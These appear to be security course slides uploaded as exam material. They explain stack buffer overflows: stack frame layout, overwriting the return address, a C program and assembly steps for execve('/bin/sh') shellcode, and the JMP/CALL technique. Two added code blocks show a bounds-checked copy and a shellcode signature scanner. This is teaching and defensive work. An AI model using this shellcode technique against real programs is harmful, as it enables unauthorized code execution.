buffer overflow attacks, Exams of Network security

buffers, different types of buffers

Typology: Exams

2017/2018

Uploaded on 07/13/2018

haritha-reddy-1

3 documents
Exploits

By Hon Ching Lo

Buffer Overflow

Virus & Worms

The "stacheldraht" distributed denial of service attack tool

Stack Basics

- A stack is a contiguous block of memory containing data.
- Stack pointer (SP) – a register that points to the top of the stack.
- The bottom of the stack is at a fixed address.
- Its size is dynamically adjusted by the kernel at run time.
- The CPU implements instructions to PUSH onto and POP off the stack.

Stack Basics

- A stack consists of logical stack frames that are pushed when calling a function and popped when returning.
- Frame pointer (FP) – points to a fixed location within a frame.
- When a function is called, the return address, stack frame pointer and the variables are pushed on the stack (in that order).
- So the return address has a higher address than the buffer.
- When we overflow the buffer, the return address will be overwritten.

[Figure: stack diagram, labelled "High memory addresses" and "Lower memory addresses"]

Another Example Code

    void function(int a, int b, int c) {
        /* local variables that live in this call's stack frame */
        char buffer1[5];
        char buffer2[10];
        (void)buffer1;
        (void)buffer2;
    }

    int main(void) {
        function(1, 2, 3);
        return 0;
    }

Stack layout for the example code

    bottom of                                                            top of
    memory                                                               memory
                    buffer2       buffer1   sfp   ret   a     b     c
    <------        [            ][        ][    ][    ][    ][    ][    ]
    top of                                                            bottom of
    stack                                                                 stack
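A bounded version of the slide's function, added here as an example and not taken from the slides: the caller's string is copied into buffer2 only when it fits, so nothing can spill from buffer2 past buffer1 and sfp onto ret. The extra `src` parameter, the `fits_in_buffer` helper and the return convention are assumptions.

```c
#include <stddef.h>
#include <string.h>

#define BUF2_SIZE 10   /* same size as buffer2[10] in the slide's example */

/* True when `len` payload bytes plus the terminating NUL fit in a buffer
 * of `bufsize` bytes. Written as len < bufsize rather than
 * len + 1 <= bufsize so a huge len cannot wrap around to a small value. */
int fits_in_buffer(size_t bufsize, size_t len) {
    return len < bufsize;
}

/* The slide's function with one hypothetical extra argument: a string to
 * store in buffer2. The copy happens only when the whole string fits;
 * otherwise the call is refused, so the bytes above buffer2 (buffer1,
 * the saved frame pointer and the return address) are never touched.
 * Returns the number of bytes stored, or -1 when the input was refused. */
int function(int a, int b, int c, const char *src) {
    char buffer1[5];
    char buffer2[BUF2_SIZE];
    size_t len = strlen(src);
    (void)a; (void)b; (void)c; (void)buffer1;  /* unused, kept from the slide */
    if (!fits_in_buffer(BUF2_SIZE, len))
        return -1;
    memcpy(buffer2, src, len + 1);             /* len + 1 <= BUF2_SIZE here */
    return (int)len;
}

int main(void) {
    /* "123456789" (9 chars) fits; "1234567890" (10 chars) needs 11 bytes */
    int ok = function(1, 2, 3, "123456789") == 9 &&
             function(1, 2, 3, "1234567890") == -1;
    return ok ? 0 : 1;
}
```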

How can we place arbitrary instructions into its address space?

- Place the code that you are trying to execute in the buffer we are overflowing, and overwrite the return address so it points back into the buffer.

    bottom of                                                  top of
    memory                                                     memory
                    DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF
                    89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF
                    buffer                sfp   ret   a     b     c
    <------        [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
                    ^                            |
                    |____________________________|
    top of                                                    bottom of
    stack                                                         stack

We want:

(iii) executing the attack code

Shellcode.c

    #include <stdio.h>
    #include <unistd.h>   /* execve */

    int main(void) {
        char *name[2];
        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
        return 0;
    }

Some modifications to the shellcode:

We want the program to exit cleanly if the execve syscall fails. We add exit(0); as the last line in the code.

Our list of steps:

- Have the null terminated string "/bin/sh" somewhere in memory.
- Have the address of the string "/bin/sh" somewhere in memory followed by a null long word.
- Copy 0xb into the EAX register.
- Copy the address of the address of the string "/bin/sh" into the EBX register.
- Copy the address of the string "/bin/sh" into the ECX register.
- Copy the address of the null long word into the EDX register.
- Execute the int $0x80 instruction.
- Copy 0x1 into the EAX register.
- Copy 0x0 into the EBX register.
- Execute the int $0x80 instruction.

Trying to put this together in Assembly language, we have:

    movl string_addr,string_addr_addr
    movb $0x0,null_byte_addr
    movl $0x0,null_addr
    movl $0xb,%eax
    movl string_addr,%ebx
    leal string_addr,%ecx
    leal null_string,%edx
    int  $0x80
    movl $0x1, %eax
    movl $0x0, %ebx
    int  $0x80
    /bin/sh string goes here.

Then, place the string after the code.

Inserting JMP and CALL instructions

    bottom of                                                  top of
    memory                                                     memory
                    DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF
                    89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF
                    buffer                sfp   ret   a     b     c
    <------        [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
                    ^|^             ^|           |
                    |||_____________||           |   (1)
                    | |______________|           |   (2)
                    |____________________________|   (3)
    top of                                                    bottom of
    stack                                                         stack

Running the shellcode

We must place the code we wish to execute in the stack or data segment. (Recall: the text region of a process is marked read-only.)

To do so, we'll place our code in a global array in the data segment. We need the hex representation of the binary code.
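A coarse signature check a defender might run over captured payloads, added here as an example and not part of the slides: it scans a byte buffer for the three textbook markers of the execve shellcode assembled above. The byte encodings (B8 0B 00 00 00 for movl $0xb,%eax, CD 80 for int $0x80) are standard x86 and are not on the page; the sample payload is constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MARK_BINSH     0x1  /* "/bin/sh" string present             */
#define MARK_EXECVE_NR 0x2  /* B8 0B 00 00 00 = movl $0xb,%eax       */
#define MARK_INT80     0x4  /* CD 80          = int $0x80            */

/* Returns 1 if `pat` (plen bytes) occurs anywhere in buf, else 0. */
static int contains(const unsigned char *buf, size_t len,
                    const unsigned char *pat, size_t plen) {
    if (plen == 0 || len < plen) return 0;
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(buf + i, pat, plen) == 0) return 1;
    return 0;
}

/* Returns a bitmask of which markers were seen in the buffer. */
unsigned shellcode_markers(const unsigned char *buf, size_t len) {
    static const unsigned char binsh[]     = "/bin/sh";
    static const unsigned char execve_nr[] = {0xB8, 0x0B, 0x00, 0x00, 0x00};
    static const unsigned char int80[]     = {0xCD, 0x80};
    unsigned mask = 0;
    if (contains(buf, len, binsh, sizeof binsh - 1))       mask |= MARK_BINSH;
    if (contains(buf, len, execve_nr, sizeof execve_nr))   mask |= MARK_EXECVE_NR;
    if (contains(buf, len, int80, sizeof int80))           mask |= MARK_INT80;
    return mask;
}

/* Constructed sample: an arbitrary prefix, the syscall-number load, the
 * trap instruction and the program name, as they would appear in a
 * captured payload. Only the marker bytes matter; this is not runnable code. */
static const unsigned char sample_payload[] = {
    'A', 'A', 'A', 'A',
    0xB8, 0x0B, 0x00, 0x00, 0x00,            /* movl $0xb,%eax */
    0xCD, 0x80,                              /* int  $0x80     */
    '/', 'b', 'i', 'n', '/', 's', 'h', 0x00  /* "/bin/sh"      */
};

int main(void) {
    unsigned m = shellcode_markers(sample_payload, sizeof sample_payload);
    printf("markers found: 0x%x\n", m);      /* all three -> 0x7 */
    return m == 0x7 ? 0 : 1;
}
```

A bare "/bin/sh" also appears in ordinary shell scripts, so one marker on its own is weak evidence; the co-occurrence of all three is what singles out the sample.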